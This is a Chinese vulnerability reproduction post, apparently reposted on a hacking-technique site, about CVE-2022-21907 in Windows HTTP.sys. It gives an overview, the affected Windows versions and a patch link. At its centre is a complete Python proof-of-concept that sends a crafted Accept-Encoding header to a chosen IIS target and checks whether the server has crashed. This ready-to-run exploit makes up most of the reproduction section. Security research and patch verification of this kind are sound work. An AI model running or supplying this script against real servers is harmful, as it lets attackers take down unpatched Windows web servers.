欢迎光临
我们一直在努力

HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现


文章来源:洛米唯熊

0x00 漏洞概述

  HTTP协议堆栈中存在远程代码执行漏洞,由于HTTP协议栈(HTTP.sys)中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。

    未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包,触发缓冲区溢出,从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”,无需用户交互,便可通过网络进行自我传播。

CVSS评分为9.8

0x01 影响范围

Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

0x02 漏洞复现

#!/usr/bin/env python3# -*- coding: utf-8 -*-# File name          : CVE-2022-21907_http.sys_crash.py# Author             : Podalirius (@podalirius_)# Date created       : 13 Jan 2022
import argparseimport datetimeimport requestsimport timeimport threading
def parseArgs(): parser = argparse.ArgumentParser(description=\"Description message\") parser.add_argument(\"-t\", \"--target\", default=None, required=True, help=\'Target IIS Server.\') parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\'Verbose mode. (default: False)\') return parser.parse_args()
def monitor_thread(target, dtime=5): print(\'[>] Started monitoring of target server for the next %d seconds.\' % dtime) for k in range(dtime): try: r = requests.get(target, timeout=1) except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e: print(\" [%s] \\x1b[1;91mTarget is down!\\x1b[0m\" % datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")) else: print(\" [%s] \\x1b[1;92mTarget is reachable!\\x1b[0m\" % datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")) time.sleep(1)
if __name__ == \'__main__\': options = parseArgs()
if not options.target.startswith(\'http://\') and not options.target.startswith(\'https://\'): target = \"http://\" + options.target else: target = options.target
payload = \'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,\'
# Starting monitoring thread t = threading.Thread(target=monitor_thread, args=(target,)) t.start() time.sleep(2)
# Sending payload print(\" [+] Sending payload ...\") try: r = requests.get(target, headers={\"Accept-Encoding\": payload}, timeout=15) except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e: t.join() print(\"[%s] \\x1b[1;91mTarget successfully crashed!\\x1b[0m\" % datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))
# Cleanup t.join()

0x03 修复方案

    官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。链接如下:

    https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907

赞(0) 打赏
未经允许不得转载:黑客技术网 » HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏